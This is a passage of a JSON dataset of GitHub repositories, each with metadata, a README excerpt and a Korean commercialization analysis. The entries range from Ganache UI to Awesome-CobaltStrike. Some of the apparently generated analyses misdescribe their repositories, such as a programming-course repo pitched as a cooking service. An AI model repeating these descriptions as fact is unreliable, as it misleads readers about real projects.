","composite_score":0.5333,"license_safety_tag":"unknown"},{"name":"trufflesuite/ganache-ui","github_url":"https://github.com/trufflesuite/ganache-ui","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":27,"description":"# Ganache UI 저장소 분석\n\n## 왜 보물인가\n암호화폐 개발자들이 자신의 프로젝트를 안전하게 테스트할 수 있는 가상 환경을 제공하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 블록체인 교육 플랫폼이 학생들에게 안전한 실습 환경을 제공하는 서비스\n2. **내부 업무 도구**: 암호화폐 거래소가 신규 기능 출시 전 내부 검증을 위한","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/trufflesuite/ganache-ui/blob/develop/static/icons/png/128x128.png?raw=true\")\n</p>\n\n## Ganache\n\nGanache is your personal blockchain for Ethereum development.\n\n<p align=\"center\">\n  <img src=\"https://github.com/trufflesuite/ganache-ui/blob/develop/.github/images/ganache_screenshot.jpg?raw=true\"/>\n</p>\n\n### Getting started\n\nYou can download a self-contained prebuilt Ganache binary for your platform of choice using the \"Download\" button on the [Ganache](https://trufflesuite.com/ganache/) website, or from this repository's [releases](https://github.com/trufflesuite/ganache-ui/releases) page.\n\nGanache is also available as a command-line tool. If you prefer working on the command-line, check out the [ganache CLI](https://github.com/trufflesuite/ganache).\n\n### Contributing\n\nPlease open issues and pull requests for new features, questions, and bug fixes.\n\nRequirements:\n\n- `node v14.21.1`\n\nTo get started:\n\n0. Clone this repo\n0. Run `npm install`\n0","composite_score":0.533,"license_safety_tag":"safe"},{"name":"Devlight/InfiniteCycleViewPager","github_url":"https://github.com/Devlight/InfiniteCycleViewPager","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":46,"description":"# InfiniteCycleViewPager 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 좌우로 넘기는 화면 전환 기능을 무한 반복으로 만들어주는 핵심 도구로, 쇼핑몰의 상품 이미지나 뉴스 피드 같은 인기 UI를 간단히 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이커머스 앱 서비스**\n상품 사진을 좌우로 넘기며 볼 수 있는 기능을 제공하","readme_excerpt":"<br/>\n<p align=\"center\">\n  <a href=\"http://devlight.io\">\n      <img src =\"https://drive.google.com/uc?export=download&id=0BxPO_UeS7wScLVBKck51Z1Rzb0E\" alt=\"Devlight\"/>\n  </a>\n</p>\n<br/>\n\nInfiniteCycleViewPager\n======================\n\nInfinite cycle ViewPager with two-way orientation and interactive effect.\n\n[![Android Arsenal](https://drive.google.com/uc?export=download&id=0BxPO_UeS7wScbldGMXh5VjBjZEE)](http://android-arsenal.com/details/1/4207)\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\n[![Android](https://drive.google.com/uc?export=download&id=0BxPO_UeS7wSccEZaclNGN0R5OWc)](https://github.com/DevLight-Mobile-Agency)\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\n[![Download](https://drive.google.com/uc?export=download&id=0BxPO_UeS7wScTkFkZk1UdEN3MHM)](https://bintray.com/gigamole/maven/infinitecycleviewpager/_latestVersion)\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\n[![License](https://drive.google.com/uc?export=download&id=0BxPO_UeS7wScU0tmeFpGMHVWNWs)](https://github.com/DevLight-Mobile-Agency/InfiniteCycleViewPager/blob","composite_score":0.533,"license_safety_tag":"safe"},{"name":"ankitpriyarup/Coding_Notes","github_url":"https://github.com/ankitpriyarup/Coding_Notes","stars":5,"language":"","license":"unknown","abandonment_months":29,"description":"# Coding_Notes 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 매일 배우는 코딩 지식을 체계적으로 정리해 놓은 학습 자료 모음으로, 교육 시장에서 즉시 활용 가능한 콘텐츠 기반 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 강의 플랫폼**: 초보자용 구조화된 학습 자료를 제공하는 월 구독형 교육 서비스\n2. **기업 신입사원 교육 ","readme_excerpt":"# Introduction\nHi, I'm Ankit Priyarup and this is my compiled coding notes comprising everything I've learned in my 4 years of B.Tech journey at Delhi Technological University as a Software Engineering Undergraduate. I hope this will come useful. Feel free to contribute to this repository, I'll happily accept any Pull Requests or issues.\n\nFollow me on Github to support my work, you can also leave me a tip here: https://www.buymeacoffee.com/ankitpriyarup <br>\nHappy Learning!\n","composite_score":0.533,"license_safety_tag":"unknown"},{"name":"ryoppippi/Gasyori100knock","github_url":"https://github.com/ryoppippi/Gasyori100knock","stars":49,"language":"Python","license":"MIT","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.5328,"license_safety_tag":"safe"},{"name":"Ewenwan/Mathematics","github_url":"https://github.com/Ewenwan/Mathematics","stars":10,"language":"MATLAB","license":"unknown","abandonment_months":69,"description":"# Mathematics 저장소 분석\n\n## 왜 보물인가\n수학 문제 풀이와 계산을 자동으로 처리할 수 있는 오픈소스 도구로, 교육·연구·비즈니스에서 반복되는 수학 작업을 빠르게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 학생들이 수학 문제를 입력하면 풀이 과정과 답을 자동으로 제공하는 웹서비스\n2. **기업 내부 도구**","readme_excerpt":"# 参考\n[（西瓜书）公式推导解析](https://github.com/Ewenwan/pumpkin-book)\n\n[程序员的数学3册 数学思维 概率论 线代csdn下载](https://download.csdn.net/download/starstars/10216368)\n\n[程序员的数学3册笔记](https://github.com/Ewenwan/book-note/tree/master/books/mathematics)\n\n[latex在线可视化编辑 hostMath](http://www.hostmath.com/)\n\n[Mathpix将截图转换成LaTeX可编辑文本 使用snap安装 sudo snap install mathpix-snipping-tool](https://snapcraft.io/mathpix-snipping-toolhttps://snapcraft.io/mathpix-snipping-tool)\n\n[python 学习线性代数](https://github.com/Ewenwan/Play-with-Linear-Algebra)\n\n[数学家 参考](http://www.mathor.com/portal.php)\n\n[数学计算 - C++数学计算](https://python.ctolib.com/categories/cpp-math.html)\n\n[数学狂想曲（一）——搞笑图片的数学原理, 欧拉公式, 傅里叶变换](http://antkillerfarm.github.io/math/2016/11/26/math.html)\n\n[Statistical learning methods, 统计学习方法，李航](https://github.com/SmirkCao/Lihang)\n\n[微积分 导数 隐函数 极限 积分 泰勒展开](https://github.com/Ewenwan/Algorithm_Interview_Notes-Chinese/blob/master/C-%E6%95%B0%E5%AD%A6/B-%E5%BE%AE%E7%A7%AF%E5%88%86%E7%9A%84%E6%9C%AC%E8%B4%A8.md)\n\n\n其他：\n\n    05 Feb 2018 ","composite_score":0.5324,"license_safety_tag":"unknown"},{"name":"taye/interact.js","github_url":"https://github.com/taye/interact.js","stars":6,"language":"TypeScript","license":"mit","abandonment_months":26,"description":"# taye/interact.js 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 사용자의 마우스, 터치, 키보드 동작을 감지하고 반응하게 만드는 기술로, 더 직관적이고 반응성 좋은 디지털 경험을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 협업 도구 SaaS**: 화이트보드나 설계 프로그램에서 사용자 손동작을 실시간으로 인식하여 더 자연스러","readme_excerpt":"<a href=\"http://interactjs.io\"><img alt=\"interact.js\" src=\"https://c4d6f7d727e094887e93-4ea74b676357550bd514a6a5b344c625.ssl.cf2.rackcdn.com/ijs-solid.svg\" height=\"70px\" width=\"100%\"></a>\n\n<h2>\n  JavaScript drag and drop, resizing and multi-touch gestures with inertia and snapping for modern browsers (and also IE9+).\n</h2>\n\n<div align=\"center\">\n<a href=\"https://gitter.im/taye/interact.js\"><img src=\"https://badges.gitter.im/taye/interact.js.svg\" alt=\"Gitter\"></a>\n<a href=\"https://www.jsdelivr.com/package/npm/interactjs\"><img src=\"https://data.jsdelivr.com/v1/package/npm/interactjs/badge\" alt=\"jsDelivr\"></a>\n<a href=\"https://github.com/taye/interact.js/actions/workflows/workflow.yml\"><img src=\"https://github.com/taye/interact.js/actions/workflows/workflow.yml/badge.svg\" alt=\"Build Status\"></a>\n<a href=\"https://codeclimate.com/github/taye/interact.js/test_coverage\"><img src=\"https://api.codeclimate.com/v1/badges/0168aeaeed781a949088/test_coverage\"/></a>\n</div>\n<br>\n\nFeatures include:\n\n- *","composite_score":0.5323,"license_safety_tag":"safe"},{"name":"girliemac/a-picture-is-worth-a-1000-words","github_url":"https://github.com/girliemac/a-picture-is-worth-a-1000-words","stars":6,"language":"","license":"CC-BY-SA-4.0","abandonment_months":28,"description":"# girliemac/a-picture-is-worth-a-1000-words 분석\n\n## 왜 보물인가\n복잡한 기술 개념을 그림과 일러스트로 쉽게 설명하는 교육 자료 모음으로, 비전공자도 어려운 개념을 직관적으로 이해할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 코딩/기술 입문자를 위한 강의 콘텐츠로 시각화 자료 판매\n2. ","readme_excerpt":"\n![header image](https://raw.githubusercontent.com/girliemac/a-picture-is-worth-a-1000-words/main/header.webp)\n\n# Doodles-as-A-Service Repo\n\n[![CC BY-SA 4.0][cc-by-sa-shield]][cc-by-sa]\n\n👋 Aloha, this is where you can grab most of my tech doodles and sketchnotes.\n\nI have been posting my tech doodles on [Twitter](https://twitter.com/girlie_mac) and [Microsoft open-source projects](https://github.com/microsoft/). I am repeatedly asked where to get the original images, especially from people who saw some of my works out of context on some social media, so I decided to put them all together on one GitHub repo.\n\nHere are some of the latest digitally created hand-drawn doodles, as well as photos of analog ones.\n\nAll my doodles are under Creative a Commons license, so please share with attributions. And I definitely don't want you to NFT them without my permission (and I won't permit you because you don't own them. They are open-sourced to be freely available for educational purpose only!)\n\nE","composite_score":0.5322,"license_safety_tag":"unknown"},{"name":"adrianhajdin/project_modern_ui_ux_gpt3","github_url":"https://github.com/adrianhajdin/project_modern_ui_ux_gpt3","stars":12,"language":"CSS","license":"unknown","abandonment_months":24,"description":"# project_modern_ui_ux_gpt3 분석\n\n## 왜 보물인가\nChatGPT 같은 AI 챗봇의 세련된 웹 디자인 코드를 바로 가져다 쓸 수 있어서, 회사 홈페이지나 AI 서비스를 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. AI 챗봇 SaaS 서비스**: 스타트업이 자신의 AI 챗봇에 이 디자인을 적용해 사용자 경험을 즉시 개","readme_excerpt":"# Modern UI/UX GPT-3\n### [Live Site](https://gpt3-jsm.com/)\n\n![Modern UI/UX GPT-3](https://i.ibb.co/TR5LW9z/image.png)\n\n### [🌟 Become a top 1% Next.js 13 developer in only one course](https://jsmastery.pro/next13)\n### [🚀 Land your dream programming job in 6 months](https://jsmastery.pro/masterclass)\n\n## Stay up to date with new projects\nNew major projects coming soon, subscribe to the mailing list to stay up to date https://resource.jsmasterypro.com/newsletter\n\n## Introduction\nThis is a code repository for the corresponding video tutorial. \n\nYou might be wondering, what are the prerequisites for building such an amazing website? Don't worry, this course is completely beginner-friendly! We're going to start easy and them move to more complex topics. Every step of the way will be explained. Alongside building the website, you'll learn:\n\n- React Functional components and their reusability\n- React file and folder structure\n- Fundamental CSS properties to master flex & grid\n- Fundamentals o","composite_score":0.532,"license_safety_tag":"unknown"},{"name":"mukulhase/WebWhatsapp-Wrapper","github_url":"https://github.com/mukulhase/WebWhatsapp-Wrapper","stars":5,"language":"Python","license":"MIT","abandonment_months":35,"description":"# WebWhatsapp-Wrapper 분석\n\n## 왜 보물인가\nWhatsApp을 자동으로 제어할 수 있는 도구로, 기업들이 고객 상담이나 마케팅 메시지를 효율적으로 보낼 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 자동화 SaaS**: 중소 전자상거래 회사가 구독해서 자동 주문 확인 메시지를 WhatsApp으로 보내기\n2. **마케팅","readme_excerpt":"<img alt=\"Logo\" src=\"https://github.com/Tobaloidee/WebWhatsapp-Wrapper/blob/master/docs/logo/logotype-a-04.png\">\n\n## (Based on web.whatsapp.com)\n[![PyPI version](https://badge.fury.io/py/webwhatsapi.svg)](https://badge.fury.io/py/webwhatsapi)\n[![Firefox version](https://img.shields.io/badge/Firefox-58.0.2-green.svg)]()\n[![All Contributors](https://img.shields.io/badge/all_contributors-0-orange.svg?style=flat-square)](#contributors)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n\n## What is it?\nThis package is used to provide a python interface for interacting with WhatsAPP Web to send and receive Whatsapp messages.\nIt is based on the official Whatsapp Web Browser Application and uses Selenium browser automation to communicate with Whatsapp Web.\n\n## How to contribute?\n[If you are new, click here](docs/contribution_guide.md)\n\n## Local installation\n\n##### Dependencies\nYou will need to install [Gecko Driver](https://github.c","composite_score":0.5319,"license_safety_tag":"safe"},{"name":"ReactiveCircus/FlowBinding","github_url":"https://github.com/ReactiveCircus/FlowBinding","stars":10,"language":"Kotlin","license":"apache-2.0","abandonment_months":39,"description":"","readme_excerpt":"# FlowBinding\n\n![CI](https://github.com/ReactiveCircus/FlowBinding/workflows/Build/badge.svg)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.github.reactivecircus.flowbinding/flowbinding-android/badge.svg)](https://search.maven.org/search?q=g:io.github.reactivecircus.flowbinding)\n[![Android API](https://img.shields.io/badge/API-14%2B-blue.svg?label=API&maxAge=300)](https://www.android.com/history/)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\nKotlin Flow binding APIs for Android's platform and unbundled UI widgets, inspired by [RxBinding][rxbinding].\n\n[Flow][flow] is (conceptually) a reactive streams implementation provided by the [kotlinx-coroutines-core][kotlinx-coroutines] artifact.\n\n**FlowBinding** offers an extensive set of extension functions that turn traditional callbacks / listeners on Android UI widgets into the `Flow` type.\n\n## Article\n\n- [Binding Android UI with Kotlin Flow][arti","composite_score":0.5318,"license_safety_tag":"safe"},{"name":"gskinnerTeam/flutter-folio","github_url":"https://github.com/gskinnerTeam/flutter-folio","stars":5,"language":"Dart","license":"MIT","abandonment_months":45,"description":"# Flutter Folio 저장소 분석\n\n## 왜 보물인가\n디자이너와 개발자가 협력하여 만든 포트폴리오 앱으로, 아름다운 사용자 인터페이스를 만드는 방법을 배우고 활용할 수 있는 완성된 예제입니다.\n\n## 어디에 쓸 수 있나\n1. **포트폴리오 SaaS 서비스**: 프리랜서와 디자이너가 자신의 작품을 전시할 수 있는 구독형 플랫폼\n2. **기업 내부 업무","readme_excerpt":"<br />\n<p align=\"center\">\n<img width=\"215\" src=\"https://user-images.githubusercontent.com/736973/187334196-b79e48b2-dbb8-4ea7-8aac-04dbc7e5159f.png#gh-dark-mode-only\">\n<img width=\"215\" src=\"https://user-images.githubusercontent.com/736973/187334195-9821c031-a566-4f8e-b4e3-3158f733c6e5.png#gh-light-mode-only\">\n</p>\n<br />\n<p align=\"center\"><img src=\"https://flutter.gskinner.com/folio/assets/images/git_promoimage.png?\" width=\"800px\"></p>\n\n# Flutter Folio\n\nA demo app showcasing how Flutter can deliver a great multi-platform experience, targeting iOS, Android, MacOS, Windows, Linux, and web. Built by [gskinner](https://gskinner.com) in partnership with Google, Flutter Folio purposefully considers user expectations, input devices and idioms for each platform, ensuring it feels at home on every device.\n\nIn addition to forking and reviewing the [MIT licensed](LICENSE.md) code available here, you can check out more information on the [Flutter Folio Showcase Website](https://flutter.gskinner.co","composite_score":0.5316,"license_safety_tag":"safe"},{"name":"codemayq/chinese_chatbot_corpus","github_url":"https://github.com/codemayq/chinese_chatbot_corpus","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":25,"description":"# 중국어 챗봇 말뭉치(Chinese Chatbot Corpus) 분석\n\n## 왜 보물인가\n중국어로 대화하는 인공지능을 만드는 데 필요한 기초 학습 자료 모음으로, 중국 시장 진출을 노리는 AI 서비스 개발자들에게 즉시 활용 가능한 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **중국어 고객 상담 챗봇 SaaS**: 한국 기업이 중국 고객을 위한 자동 상담","readme_excerpt":"# 说明\n该库是对目前市面上已有的开源中文聊天语料的搜集和系统化整理工作\n\n该库搜集了包含\n- chatterbot\n- 豆瓣多轮\n- PTT八卦语料\n- 青云语料\n- 电视剧对白语料\n- 贴吧论坛回帖语料\n- 微博语料\n- 小黄鸡语料\n\n共8个公开闲聊常用语料和短信，白鹭时代问答等语料。\n\n并对8个常见语料的数据进行了统一化规整和处理，达到直接可以粗略使用的目的。\n\n**使用该项目，即可对所有的聊天语料进行一次性的处理和统一下载，不需要到处自己去搜集下载和分别处理各种不同的格式。**\n\n# 环境\npython3\n# 处理过程\n将各个来源的语料按照其原格式进行提取，提取后进行繁体字转换，然后统一变成一轮一轮的对话。\n# 数据来源及说明\n语料名称 | 语料数量 | 语料来源说明 | 语料特点 | 语料样例 | 是否已分词\n---|---|---|---|---|---\nchatterbot | 560 | 开源项目 | 按类型分类，质量较高  | Q:你会开心的 A:幸福不是真正的可预测的情绪。 | 否\ndouban（豆瓣多轮） | 352W | 来自北航和微软的paper, 开源项目 | 噪音相对较少，原本是多轮（平均7.6轮）  | Q:烟台 十一 哪 好玩 A:哪 都 好玩 · · · · | 是\nptt（PTT八卦语料） | 77W（v1版本42W） | 开源项目，台湾PTT论坛八卦版 | 繁体，语料较生活化，有噪音  | Q:为什么乡民总是欺负国高中生呢QQ\tA:如果以为选好科系就会变成比尔盖兹那不如退学吧  | 否\nqingyun（青云语料） | 10W | 某聊天机器人交流群 | 相对不错，生活化  | Q:看来你很爱钱 \t A:噢是吗？那么你也差不多了 | 否\nsubtitle（电视剧对白语料） | 274W | 开源项目，来自爬取的电影和美剧的字幕 | 有一些噪音，对白不一定是严谨的对话，原本是多轮（平均5.3轮）  | Q:京戏里头的人都是不自由的\tA:他们让人拿笼子给套起来了了 | 否\ntieba（贴吧论坛回帖语料） | 232W | 偶然找到的 | 多轮，有噪音  | Q:前排，鲁迷们都起床了吧\tA:标题说助攻，但是看了那球，真是活生生的讽刺了 | 否\nweibo（微博语料） | 443W | 来自华为的paper | 仍有一些噪音  | Q:","composite_score":0.5314,"license_safety_tag":"safe"},{"name":"tulingxueyuan/CookBook_and_code","github_url":"https://github.com/tulingxueyuan/CookBook_and_code","stars":499,"language":"Jupyter Notebook","license":"unknown","abandonment_months":71,"description":"# CookBook_and_code 상용화 분석\n\n## 왜 보물인가\n요리 방법과 프로그래밍 코드를 함께 제공하는 실용적인 학습 자료로, 초보자도 따라 배울 수 있는 친절한 튜토리얼 모음입니다.\n\n## 어디에 쓸 수 있나\n- **요리 교육 SaaS**: 동영상 강의와 함께 레시피별 코드(식재료 계산, 조리 시간 타이머 등)를 제공하는 구독 서비스\n- **내부","readme_excerpt":"# CookBook and Code by TuLingXueYuan\n\n关于图灵学院的课件放入此地\n\n其他信息请访问图灵学院官网： www.tulingxueyuan.com\n或者咨询QQ群： 158184562\n","composite_score":0.5312,"license_safety_tag":"unknown"},{"name":"Hari-Nagarajan/fairgame","github_url":"https://github.com/Hari-Nagarajan/fairgame","stars":8,"language":"Python","license":"GPL-3.0","abandonment_months":42,"description":"# Fairgame 저장소 분석\n\n## 왜 보물인가\n게임 콘솔(PS5, Xbox 등)을 정가에 구매할 수 있도록 자동으로 재고를 모니터링하고 구매를 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독료를 받고 사용자들이 웹 대시보드에서 여러 온라인 매장의 재고를 동시에 모니터링하는 플랫폼\n2. **내부 업무 도구**: 소","readme_excerpt":"# FairGame README\n\n**Note: Development is no longer active on this project. Pull requests submitted by the community will still be reviewed and approved, if valid and functional.**\n\n# Table of Contents:\n* [About FairGame](#About-FairGame)\n    * [Current Functionality](#Current-Functionality)\n    * [Disclaimer](#Disclaimer) \n* [Installation](#Installation)\n    * [Requirements](#Requirements)\n    * [Quick Start](#Quick-Start)\n    * [Detailed Directions](#Detailed-Directions)\n        * [Python](#Python)\n        * [Downloading FairGame](#Downloading-FairGame)\n        * [Installing Dependencies](#Installing-Dependencies)\n        * [Configuration](#Configuration)\n        * [Running the program](#Running-the-program)\n        * [Start Up](#Start-Up)\n    * [Other Installation Help](#Other-Installation-Help)\n        * [ASINs](#ASINs)\n        * [Platform Specific](#Platform-Specific)\n* [Advanced Configuration](#Advanced-Configuration) \n    * [Notifications](#Notifications)\n        * [Sounds](#Sou","composite_score":0.531,"license_safety_tag":"restricted"},{"name":"tj/go-naturaldate","github_url":"https://github.com/tj/go-naturaldate","stars":9,"language":"Go","license":"MIT","abandonment_months":25,"description":"","readme_excerpt":"# Go Natural Date\n\nNatural date time parsing for Go. This package was designed for parsing human-friendly relative date/time ranges in [Apex Logs](https://apex.sh/logs/)' command-line log search.\n\n## Examples\n\nHere are some examples of the types of expressions currently supported, arbitrary text is currently ignored.\n\n- now\n- today\n- yesterday\n- 5 minutes ago\n- three days ago\n- last month\n- next month\n- one year from now\n- yesterday at 10am\n- last sunday at 5:30pm\n- sunday at 22:45\n- next January\n- last February\n- December 25th at 7:30am\n- 10am\n- 10:05pm\n- 10:05:22pm\n- Restart the server in 5 days from now\n- Remind me on the 25th of December at 7:30am\n- Message me in two weeks\n- See the [tests](./naturaldate_test.go) for more examples\n\n## Direction\n\nA default direction can be applied using `WithDirection()` for ambiguous expressions such as `sunday`, or `september`. By default `naturaldate.Past` is used, so they will be equivalent to `last sunday` and `last september`.\n\n---\n\n[![GoDoc](","composite_score":0.5308,"license_safety_tag":"safe"},{"name":"yiminghe/async-validator","github_url":"https://github.com/yiminghe/async-validator","stars":6,"language":"TypeScript","license":"mit","abandonment_months":28,"description":"# async-validator 상용화 분석\n\n## 왜 보물인가\n웹 서비스에서 사용자가 입력한 정보가 올바른지 자동으로 검증해주는 핵심 도구로, 수천 개의 프로젝트에서 기본으로 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n- **회원가입 플랫폼 SaaS**: 이메일, 비밀번호, 전화번호 등 입력값 검증 기능을 자동화해 개발 시간 30% 단축\n- **전자상","readme_excerpt":"# async-validator\n\n[![NPM version][npm-image]][npm-url]\n[![build status][travis-image]][travis-url]\n[![Test coverage][coveralls-image]][coveralls-url]\n[![node version][node-image]][node-url]\n[![npm download][download-image]][download-url]\n[![npm bundle size (minified + gzip)][bundlesize-image]][bundlesize-url]\n\n[npm-image]: https://img.shields.io/npm/v/async-validator.svg?style=flat-square\n[npm-url]: https://npmjs.org/package/async-validator\n[travis-image]:https://app.travis-ci.com/yiminghe/async-validator.svg?branch=master\n[travis-url]: https://app.travis-ci.com/github/yiminghe/async-validator\n[coveralls-image]: https://img.shields.io/coveralls/yiminghe/async-validator.svg?style=flat-square\n[coveralls-url]: https://coveralls.io/r/yiminghe/async-validator?branch=master\n[node-image]: https://img.shields.io/badge/node.js-%3E=4.0.0-green.svg?style=flat-square\n[node-url]: https://nodejs.org/download/\n[download-image]: https://img.shields.io/npm/dm/async-validator.svg?style=flat-square\n[dow","composite_score":0.5308,"license_safety_tag":"safe"},{"name":"minivision-ai/photo2cartoon","github_url":"https://github.com/minivision-ai/photo2cartoon","stars":6,"language":"Python","license":"MIT","abandonment_months":48,"description":"# Photo2Cartoon 프로젝트 분석\n\n## 왜 보물인가\n일반 사진을 만화 같은 그림으로 자동 변환해주는 기술로, 소셜 미디어나 마케팅 콘텐츠 제작에 필요한 수요가 지속적으로 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사진을 업로드하면 만화체 이미지로 변환해주는 웹사이트 운영 (프로필 사진 변환, 초상화 서비스)\n- *","readme_excerpt":"<div align='center'>\r\n  <img src='./images/title.png'>\r\n</div>\r\n\r\n# 人像卡通化 (Photo to Cartoon)\r\n\r\n**中文版** | [English Version](README_EN.md)\r\n\r\n该项目为[小视科技](https://www.minivision.cn/)卡通肖像探索项目。您可使用微信扫描下方二维码或搜索“AI卡通秀”小程序体验卡通化效果。\r\n\r\n<div>\r\n  <img src='./images/QRcode.jpg' height='150px' width='150px'>\r\n</div>\r\n\r\n也可以前往我们的ai开放平台进行在线体验：[https://ai.minivision.cn/#/coreability/cartoon](https://ai.minivision.cn/#/coreability/cartoon)\r\n\r\n技术交流QQ群：937627932\r\n\r\n**Updates**\r\n- `2021.12.2`: [在Replicate平台体验](https://beta.replicate.ai/hao-qiang/photo2cartoon)\r\n- `2020.12.2`: 开源基于paddlepaddle的项目[photo2cartoon-paddle](https://github.com/minivision-ai/photo2cartoon-paddle)。\r\n- `2020.12.1`: 增加onnx测试模型, 详情请见 [test_onnx.py](./test_onnx.py)。\r\n\r\n## 简介\r\n人像卡通风格渲染的目标是，在保持原图像ID信息和纹理细节的同时，将真实照片转换为卡通风格的非真实感图像。我们的思路是，从大量照片/卡通数据中习得照片到卡通画的映射。一般而言，基于成对数据的pix2pix方法能达到较好的图像转换效果，但本任务的输入输出轮廓并非一一对应，例如卡通风格的眼睛更大、下巴更瘦；且成对的数据绘制难度大、成本较高，因此我们采用unpaired image translation方法来实现。\r\n\r\nUnpaired image translation流派最经典方法是CycleGAN，但原始CycleGAN的生","composite_score":0.5308,"license_safety_tag":"safe"},{"name":"zyfra/ebonite","github_url":"https://github.com/zyfra/ebonite","stars":9,"language":"Python","license":"Apache-2.0","abandonment_months":43,"description":"","readme_excerpt":".. image:: ebonite.jpg\n.. start-badges\n\n.. list-table::\n    :stub-columns: 1\n\n    * - docs\n      - |docs| |slack|\n    * - tests\n      - | |build| |coveralls|\n    * - package\n      - | |version| |wheel| |downloads| |supported-versions|\n        | |commits-since|\n\n.. |docs| image:: https://readthedocs.org/projects/ebonite/badge/?style=flat\n    :target: https://readthedocs.org/projects/ebonite\n    :alt: Documentation Status\n\n.. |build| image:: https://github.com/zyfra/ebonite/workflows/tox/badge.svg\n    :alt: Actions Status\n    :target: https://github.com/zyfra/ebonite/actions\n\n.. |requires| image:: https://requires.io/github/zyfra/ebonite/requirements.svg?branch=master\n    :alt: Requirements Status\n    :target: https://requires.io/github/zyfra/ebonite/requirements/?branch=master\n\n.. |coveralls| image:: https://coveralls.io/repos/github/zyfra/ebonite/badge.svg?branch=master\n    :alt: Coverage Status\n    :target: https://coveralls.io/r/zyfra/ebonite\n\n.. |codecov| image:: https://codecov.io/","composite_score":0.5306,"license_safety_tag":"safe"},{"name":"aaronwangy/Data-Science-Cheatsheet","github_url":"https://github.com/aaronwangy/Data-Science-Cheatsheet","stars":12,"language":"TeX","license":"unknown","abandonment_months":39,"description":"# Data Science Cheatsheet 분석\n\n## 왜 보물인가\n데이터 분석에 필요한 핵심 개념과 코드를 한눈에 볼 수 있는 학습 자료로, 초보자부터 실무자까지 빠르게 참고할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 학습 플랫폼 SaaS**: 데이터 분석 입문자를 위한 구독형 튜토리얼 서비스로 월 구독료를 받으며 운영\n2. **기업 ","readme_excerpt":"# Data Science Cheatsheet 2.0\n\nA helpful 5-page data science cheatsheet to assist with exam reviews, interview prep, and anything in-between. It covers over a semester of introductory machine learning, and is based on MIT's Machine Learning courses 6.867 and 15.072. The reader should have at least a basic understanding of statistics and linear algebra, though beginners may find this resource helpful as well. \n\nInspired by Maverick's *Data Science Cheatsheet* (hence the 2.0 in the name), located [here](https://github.com/ml874/Data-Science-Cheatsheet).\n\nTopics covered:\n- Linear and Logistic Regression\n- Decision Trees and Random Forest\n- SVM\n- K-Nearest Neighbors\n- Clustering\n- Boosting\n- Dimension Reduction (PCA, LDA, Factor Analysis)\n- Natural Language Processing\n- Neural Networks\n- Recommender Systems\n- Reinforcement Learning\n- Anomaly Detection\n- Time Series\n- A/B Testing\n\nThis cheatsheet will be occasionally updated with new/improved info, so consider a follow or star to stay up to","composite_score":0.5306,"license_safety_tag":"unknown"},{"name":"zer0yu/Awesome-CobaltStrike","github_url":"https://github.com/zer0yu/Awesome-CobaltStrike","stars":8,"language":"","license":"unknown","abandonment_months":33,"description":"# zer0yu/Awesome-CobaltStrike 분석\n\n## 왜 보물인가\nCobaltStrike는 보안 전문가들이 시스템 침투를 테스트하는 도구인데, 이 저장소는 관련 자료와 활용법을 모아놓아 보안 교육과 방어 전략 수립에 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 진단 서비스**: 중견기업의 정보보안 취약점을 찾아내는 유","readme_excerpt":"# Awesome CobaltStrike ![Awesome CobaltStrike](https://img.shields.io/badge/awesome-cobaltstrike-red.svg) ![Awesome community](https://img.shields.io/badge/awesome-community-green.svg)\n\n### Contents\n\n- [0x00 Introduction](#0x00-introduction)\n- [0x01 Articles & Videos](#0x01-articles--videos)\n  - [1. Basic Knowledge](#1-basic-knowledge)\n  - [2. Crack and Customisation](#2-crack-and-customisation)\n  - [3. Useful Trick](#3-useful-trick)\n  - [4. CobaltStrike Hide](#4-cobaltstrike-hide)\n  - [5. CobaltStrike Analysis](#5-cobaltstrike-analysis)\n  - [6. CobaltStrike Video](#6-cobaltstrike-video)\n- [0x02 C2 Profiles](#0x02-c2-profiles)\n- [0x03 BOF](#0x03-bof)\n- [0x04 Aggressor Script](#0x04-aggressor-script)\n- [0x05 Related Tools](#0x05-related-tools)\n- [0x06 Related Resources](#0x06-related-resources)\n\n### 0x00 Introduction\n1. The first part is a collection of quality articles about CobaltStrike\n2. The third part is about the integration of the new features BOF resources\n3. This project is to ","composite_score":0.5306,"license_safety_tag":"unknown"},{"name":"AloneMonkey/frida-ios-dump","github_url":"https://github.com/AloneMonkey/frida-ios-dump","stars":80,"language":"JavaScript","license":"MIT","abandonment_months":37,"description":"# frida-ios-dump 분석 보고서\n\n## 왜 보물인가\niPhone 앱의 내부 구조를 분석할 수 있는 도구로, 보안 전문가와 개발자들이 앱 취약점을 찾거나 앱 동작을 이해하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 보안 진단 SaaS**: 기업 고객이 자사 iOS 앱의 보안 취약점을 자동 